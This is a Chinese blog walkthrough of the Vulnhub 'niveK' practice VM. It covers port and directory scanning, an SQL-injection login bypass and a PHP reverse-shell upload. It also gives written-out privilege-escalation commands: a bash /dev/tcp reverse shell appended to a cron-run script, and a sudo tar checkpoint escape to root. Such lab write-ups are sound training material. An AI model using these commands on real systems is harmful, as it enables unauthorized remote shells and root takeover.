nivek(tar提权)

最新推荐文章于 2024-07-25 15:50:18 发布
最新推荐文章于 2024-07-25 15:50:18 发布
阅读量800 收藏
点赞数
分类专栏: Walkthrough系列 文章标签: web linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/127773796
版权

环境准备

靶机链接:百度网盘 请输入提取码

提取码:h4xk

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

用nmap命令探测目标靶机开放端口和服务

漏洞利用

1.用gobuster探测目录,没探测出来

2.换成7080端口开始探测

gobuster dir -u http://192.168.1.107:7080 \ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

3.login.php是一个登录界面

4.尝试SQL注入漏洞

点俩次放包,页面就进去了

5.成功登录进去,寻找可利用信息,和上传点

6.发现一个上传点

7.在本地开启监听,尝试上传我们的php-reverse-shell.php(github里有),发现上传路径。

8.访问路径,成功反弹shell

权限提升

1.用python反弹一个交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

2.寻找有suid执行权限的文件,发现有一个/bin/bash

find / -perm -u=s -type f 2>/dev/null

3.用-p提权上来发现euid变为了eren用户,那就可以进入用户目录,有一个backup.sh文件eren用户权限是可读可写可执行。

echo 'bash -i >& /dev/tcp/192.168.1.106/4444 0>&1' >> backup.sh

4.把反弹shell的命令写入.sh文件中,等待反弹。

时间有点长,用命令查看大概五分钟

cat /etc/crontab

5.成功提权为eren用户

sudo -l 查看可执行命令

sudo /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

6.成功进入root,轻松拿下!!!

魏钦6666
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
nivek靶场-vulnhub
lionwerson的博客
11-22 2823
https://download.vulnhub.com/hms/niveK.ovahttp://niveK靶场1.下载靶场,打开virtual box导入靶场,网络改为桥接模式,打开虚拟机。 2.nmap先来扫描一下端口: nmap 192.168.0.17 -p- 扫描出7080为web端口,浏览器打开发现登录页面: 抓包一下,看到登录页面有sql注入漏洞: 既然存在sql注入,那么就试了一下万能登录,登录成功,进入了后台: 进入后台寻找注入和上传点,另外扫描器找...
HTB靶场系列 linux靶机 Tartarsause靶机
顶峰
12-14 320
2.在分享的文件夹中创建一个回连shell脚本命名为wp-load.php,我使用的是/usr/share/webshells/php/php-reverse-shell.php这个msf的脚本,注意修改脚本内的host和port。那么我们的思路就有了,就是在上述脚本完成备份后休息的那三十秒,我们打开备份,修改其中的某个文件为/root/root.txt然后再把这个备份重新压缩好,把原来的备份删掉,之后打开错误报告查看root文件就是了。注意,端口改自己脚本中的端口,地址的端口最后必须加/
NiveK 靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
01-16 321
NiveK靶场渗透记录~
Vulnhub靶机:niveK
qq_48904485的博客
01-30 1057
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:niveK(10.0.2.41)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/hms/niveK.ova。
vlunhub系列之narak
hanjinming110的博客
08-05 243
vlunhub系列之narak
B2B市场采购指南.pdf
01-02
Mosconi和Nivek Sankaran共同撰写的报告,出自《麦肯锡高层管理论丛》2001年2期。这篇报告主要探讨了企业对企业(B2B)电子市集的价值及其可持续性。报告指出,B2B电子市集的成功并不单纯依赖于价格竞争,而是应该...
tar提权
m0_57221101的博客
01-21 1338
当某台机器给予tar sudo更高权限的时候可以尝试使用以下方式来提权 方法一 sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash 借用tar检查点功能实现提权 -c 建立一个新的压缩文档 -f 指定压缩文档 --checkpoint=n 每写入n项记录进行一次检查点操作 --checkpoint-action每次到检查点时执行的操作,语法格式符合shell脚
linux定时任务打包提权&docker组提权
m0_62207170的博客
03-03 692
linux定时任务打包提权&docker组提权
TRY HACK ME | Skynet「SMB信息搜集+TAR提权
AKAHRZ的博客
05-14 847
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起å进步、一起GET THE FLAG! THM靶场:Skynet「SMB信息搜集+TAR提权」THM靶场:SkynetSteelmountain 靶场通关小结 THM靶场:Skynet 这个房间是一.
使用tar --checkpoint提权操作 详解--checkpoint-action的参数及作用
qq_33958714的博客
12-12 3356
如果管理员给予了某个普通用户tar命令的超级管理员操作: 那么我们可以使用tar命令进行提权,命令如下 sudo -u root tar cf /dev/null exploit --checkpoint=1 --checkpoint-action=exec="/bin/bash" -c:创建新的档案文件,相当于打包(-x,相反的操作,拆包) -f:使用档名,f之后直接加档名,中间不能加其他参数 --checkpoint=n:每写入n个记录之后设置一个检查点,在...
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
20210424web渗透学习之命令注入提权的常见方法%ctf题目(通配符在野、tar、chown、rsync、ln)
qq_45290991的博客
04-24 1242
命令执行到提权 </h1> <div class="clear"></div> <div class="postBody"> <div id="cnblogs_post_body" class="blogpost-body blogpost-body-html"> Zedd / 2019-03-1...
Vulnhub_Nivek
qq_45434762的博客
08-29 597
主机信息kali:192.168.3.28 nivek:192.168.3.31 信息收集通过nmap探测目标主机发现开放了21、22、7080三个端口nmap -T4 -A -v -p-...
基于Linux下的root提权骚操作
帅醉了的博客
01-30 5600
0x00_前言 小小博客,大大梦想。 博主还是小白,总结几个有关于在入侵靶机后,如何在Linux下的关于普通用户提权到root下的操作,如有错误或其他请多多包含,希望提出多交流。 0x01_操作简介 提权的三个骚操作: 内核溢出 明文密文解密 计划任何进程 密码复用 加粗样式 ...
linux命令常用合集,提权(转)
luffysong的博客
12-20 2346
常用9类命令   文件目录类 1.建立目录:mkdir 目录名 2.删除空目录:rmdir 目录名 3.无条件删除子目录: rm -rf 目录名 4.改变当前目录:cd 目录名 (进入用户home目录:cd ~;进入上一级目录:cd -) 5.查看自己所在目录:pwd 6.查看当前目录大小:du 7.显示目录文件列表:ls -l (-a:增加显示隐含目录) 其中:蓝:目录;绿:可执行
Tryhackme -Skynet(考点:smb & 密码爆破 & cuppa RFI & cronjob - tar提权
冬萍子癸水
05-27 536
1 扫描 忘了截图了,就是445 smb和80http,一个进去找敏感文件,另一个进去搜集信息。 2 web信息搜集 gobuster扫gobuster dir -u http://10.10.190.147 -w /root/directory-list-2.3-medium.txt -t 64 松鼠邮件那个进去后是登录框。但是不知道密码 3 smb利用 enum4linux -a Ip地址 看到有俩处,匿名的当然可以进,mile那个没密码。 进匿名看,再log里,看到很多密码似的,保存下来,可
Linux玩转指南
qq_43535970的博客
07-25 846
Linux是一个类Unix操作系统,最初由Linus Torvalds于1991年发布。它是基于开源的内核,并结合了大量的开源软件,形成了完整的操作系统。Linux的设计理念强调开源和自由,使得它在全球范围内得到广泛应用,从个人电脑到服务器、嵌入式系统,甚至超级计算机。
linux】Shell脚本三剑客之grep和egrep命令的详细用法攻略
景天科技苑
07-25 4673
Linux和Unix系统中,grep(Global Regular Expression Print)是一个非常强大的文本搜索工具,能够根据用户指定的模式(由正则表达式和文本字符组合而成)对目标文件进行逐行搜索,并显示匹配到的行。而egrep(Extended Grep)则是`grep`的扩展版本,支持更多的正则表达式语法。尽管egrep在较新的系统中被`grep -E`选项所取代,但了解其用法对于理解和使用正则表达式仍然具有重要意义。
Linux初学基本命令
最新发布
yuan20010401的博客
07-25 657
1、rm 文件名称 删除多个文件多个目录需要用空格 删除根目录(rm -rf /*)1、touch 文件名字 用于linux创建文件 创建多个目录需要用空格隔开。2、mkdir 目录名称 用于创建文件夹 创建多个嵌套文件夹需要用/隔开。1、cp 当前文件 其他目录名称 拷贝文件夹需要在最后 -r。退出不保存时按Esc+:q!1、ls 查看当前目录下面的文件或者文件夹。2、more 文件名称 查看文件更多内容。1、mv 原文件路径 目标文件路径。退出保存时按Esc + :wq。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值